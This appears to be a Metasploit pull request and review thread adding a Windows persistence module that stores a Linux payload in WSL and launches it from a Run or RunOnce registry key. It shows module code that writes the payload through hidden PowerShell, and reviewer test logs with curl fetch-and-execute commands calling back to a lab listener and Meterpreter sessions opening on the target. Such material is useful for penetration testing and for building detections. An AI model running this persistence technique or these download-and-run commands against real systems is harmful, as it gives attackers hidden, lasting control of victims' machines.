### PR TITLE
Windows WSL registry persistence

### LINKED ISSUE #20683: payload/cmd/unix/reverse_ssh payload broken
```
msf exploit(windows/persistence/registry_wsl) > set payload payload/cmd/unix/reverse_ssh
payload => cmd/unix/reverse_ssh
msf exploit(windows/persistence/registry_wsl) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[-] Exploit failed: NoMethodError undefined method `>' for nil
```

Other payloads work fine, so it seems like theres a stray `>` in  `payload/cmd/unix/reverse_ssh` causing the error

### PR DESCRIPTION
**Pull request by h00die**
Fixes #20683
Creates a new Windows persistence by putting a LINUX payload in WSL and executing it from the registry. Does your Windows AV detect Linux payloads? Hope so!

Also ninjas in a patch to where a crash would happen with reverse_ssh payloads because there was no `wfsdelay`

## Verification

- [ ] Start `msfconsole`
- [ ] exploit the box somehow
- [ ] `use exploit/windows/persistence/wsl/registry`
- [ ] `set SESSION <id>`
- [ ] `exploit`
- [ ] **Verify** persistence is created
- [ ] **Verify** cleanup works
- [ ] **Document** is updated and correct

### CODE REVIEW

File: lib/msf/core/handler/reverse_ssh.rb [hunk 1]
```diff
@@ -141,6 +141,8 @@ def create_session(ssh, opts = {})
       # Always wait at least 5 seconds for this payload (due to channel delays)
       #
       def wfs_delay
+        return 5 if datastore['WfsDelay'].nil?
+
```
Comment (msutovsky-r7) [inline lib/msf/core/handler/reverse_ssh.rb:145]: Should this be more aligned with `wfs_delay` in `generic.rb`?

File: modules/exploits/windows/persistence/wsl/registry.rb [hunk 2]
```diff
@@ -0,0 +1,246 @@
...
+    )
+
+    register_options([
+      OptEnum.new('STARTUP',
+                  [true, 'Startup type for the persistent payload.', 'USER', ['USER', 'SYSTEM']]),
+      OptString.new('RUN_NAME',
+                    [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
+      OptEnum.new('REG_KEY', [true, 'Registry Key To Install To', 'Run', %w[Run RunOnce]]),
+      OptString.new('PAYLOAD_NAME',
+                    [false, 'The filename for the payload to be used on the target host (random by default).', nil]),
```
Comment (msutovsky-r7) [inline modules/exploits/windows/persistence/wsl/registry.rb]: I think the datastore option doesn't need to have default value if it's not required.

File: modules/exploits/windows/persistence/wsl/registry.rb [hunk 3]
```diff
@@ -0,0 +1,246 @@
...
+    #                    ServerComponent\Id : 1033
+    #                    ServerComponent\Type : Feature
+    #                    ServerComponent\UniqueName : Microsoft-Windows-Subsystem-Linux
+    #                    ServerComponent\Deploys\Update\Name : Microsoft-Windows-Subsystem-Linux
+    return false unless have_powershell?
+
+    cmd = 'powershell.exe -WindowStyle Hidden -Command "Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux"'
+    result = cmd_exec(cmd)
+
+    return false if result.nil? || result.empty?
```
Comment (msutovsky-r7) [inline modules/exploits/windows/persistence/wsl/registry.rb]: I *think* you can use this:
```suggestion
    return false if result.blank?
```

**Comment by msutovsky-r7** [comment]
```
msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./vTOasmulJkca http://192.168.168.128:8080/Qkf34tA1N4T--896aQCPmg;chmod +x ./vTOasmulJkca;./vTOasmulJkca&
[*] Exploit running as background job 12.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /Qkf34tA1N4T--896aQCPmg
[*] Started reverse TCP handler on 192.168.168.128:9999 
msf exploit(windows/persistence/wsl/registry) > [!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cLlzpsCSmQjDhZN
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/FNiiQC
powershell.exe -WindowStyle Hidden -Command "wsl bash -lc 'echo Y3VybCAtc28gLi92VE9hc211bEprY2EgaHR0cDovLzE5Mi4xNjguMTY4LjEyODo4MDgwL1FrZjM0dEExTjRULS04OTZhUUNQbWc7Y2htb2QgK3ggLi92VE9hc211bEprY2E7Li92VE9hc211bEprY2Em | base64 -d > /home/ms/FNiiQC'"
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\7PVpLpaz
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251118.5820/DESKTOP-FL6SVUR_20251118.5820.rc
[*] 192.168.168.221 - Meterpreter session 11 closed.  Reason: Died
[*] 192.168.168.221 - Meterpreter session 12 closed.  Reason: Died
[*] Client 192.168.168.221 requested /Qkf34tA1N4T--896aQCPmg
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Meterpreter session 13 opened (192.168.168.128:9999 -> 192.168.168.221:59372) at 2025-11-18 16:00:25 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 

Active sessions
===============

  Id  Name  Type                   Information                       Connection
  --  ----  ----                   -----------                       ----------
  13        meterpreter x64/linux  ms @ DESKTOP-FL6SVUR.localdomain  192.168.168.128:9999 -> 192.168.168.221:59372 (::1)

msf exploit(windows/persistence/wsl/registry) > sessions  13
[*] Starting interaction with 13...

meterpreter > sysinfo 
Computer     : DESKTOP-FL6SVUR.localdomain
OS           : Ubuntu 24.04 (Linux 6.6.87.2-microsoft-standard-WSL2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms
```

File: lib/msf/core/handler/reverse_ssh.rb (hunk 1 above)
Comment (h00die) [reply lib/msf/core/handler/reverse_ssh.rb:145]: I kept it inline with https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/handler/reverse_ssh.rb#L144

**Comment by h00die** [comment]
Good to see it tested on WSL 2!

File: modules/exploits/windows/persistence/wsl/registry.rb [hunk 4]
```diff
@@ -0,0 +1,246 @@
...
+    @clean_up_rc << "reg deleteval -k '#{root_path}\\#{blob_reg_key}' -v '#{blob_reg_name}'\n"
+    if new_key
+      @clean_up_rc << "reg deletekey -k '#{root_path}\\#{blob_reg_key}'\n"
+    end
+    @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{regkey}' -v '#{cmd_reg}'\n"
+  end
+
+  def check
+    # /tmp seems to persist on an Ubuntu WSL
+    # print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('/tmp')
```
Comment (msutovsky-r7) [inline modules/exploits/windows/persistence/wsl/registry.rb]: I've had some issues with WSL 2, where the `/tmp` is not persistent, maybe we should take it into account?

File: modules/exploits/windows/persistence/wsl/registry.rb [hunk 5]
```diff
@@ -0,0 +1,246 @@
...
+
+    # write our payload into a file
+    vprint_status("Writing payload to: #{datastore['WritableDir']}/#{payload_name}")
+
+    b64_payload = Rex::Text.encode_base64(payload.encoded)
+
+    bash_command = "bash -lc 'echo #{b64_payload} | base64 -d > #{datastore['WritableDir']}/#{payload_name}'"
+    ps_command = "powershell.exe -WindowStyle Hidden -Command \"wsl #{bash_command}\""
+
+    resp = cmd_exec(ps_command)
```
Comment (msutovsky-r7) [inline modules/exploits/windows/persistence/wsl/registry.rb]: Occasionally, the `cmd_exec` timed out, because `wsl` was taking its sweet time to start - we should probably increase timeout here to avoid module failure because of this.

**Review by msutovsky-r7 — COMMENTED** [review]
```
msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./OuYASrLw http://192.168.168.128:8080/HygsSaoDfedPTzwLqWRI2A;chmod +x ./OuYASrLw;./OuYASrLw&
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/wsl/registry) > 
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /HygsSaoDfedPTzwLqWRI2A
[*] Started reverse TCP handler on 192.168.168.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rjxAUFrhShlH6RC
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/vLcySFDA
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\972rGv1z
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251119.1506/DESKTOP-FL6SVUR_20251119.1506.rc
[*] 192.168.168.221 - Meterpreter session 1 closed.  Reason: Died

msf exploit(windows/persistence/wsl/registry) > 
[*] Client 192.168.168.221 requested /HygsSaoDfedPTzwLqWRI2A
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Command shell session 2 opened (192.168.168.128:4444 -> 192.168.168.221:51234) at 2025-11-19 12:17:03 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 2
[*] Starting interaction with 2...

id
uid=1000(ms) gid=1000(ms) groups=1000(ms),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users)
```

**Review by msutovsky-r7 — APPROVED** [review]
```
msf exploit(windows/persistence/wsl/registry) > run verbose=true 
[*] Command to run on remote host: curl -so ./siucFmDu http://192.168.168.128:8080/M1We21fZKyvgtWK9IWStLA;chmod +x ./siucFmDu;./siucFmDu&
[*] Exploit running as background job 0.
[*] Fetch handler listening on 192.168.168.128:8080
[*] HTTP server started
[*] Adding resource /M1We21fZKyvgtWK9IWStLA
[*] Started reverse TCP handler on 192.168.168.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows. This module works with: Unix, Linux.
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XtZdtoBY3e6LPMq
[+] The target is vulnerable. Registry writable and WSL installed
[*] Root path is HKCU
[*] Enumerating WSL Instances
WSL
===

#  Instance_Name  State    Version  Default
-  -------------  -----    -------  -------
1  Ubuntu         Running  2        true

[*] Writing payload to: /home/ms/EhYwlsGxQUDG. WSL may take a little while to start up...
[+] Payload wrote successfully
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\0P4pS3uk
[*] Meterpreter-compatible Cleanup RC file: /home/ms/.msf4/logs/persistence/DESKTOP-FL6SVUR_20251120.5607/DESKTOP-FL6SVUR_20251120.5607.rc
[*] 192.168.168.221 - Meterpreter session 1 closed.  Reason: Died
[*] Client 192.168.168.221 requested /M1We21fZKyvgtWK9IWStLA
[*] Sending payload to 192.168.168.221 (curl/8.5.0)
[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 192.168.168.221:56566) at 2025-11-20 11:58:22 +0100

msf exploit(windows/persistence/wsl/registry) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : DESKTOP-FL6SVUR.localdomain
OS           : Ubuntu 24.04 (Linux 6.6.87.2-microsoft-standard-WSL2)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms
```

**Comment by msutovsky-r7** [comment]
# Release Notes

Adds a new Windows persistence module - the WSL registry module. The module will create registry entries (`Run`, `RunOnce`) to run a Linux payload stored in WSL.
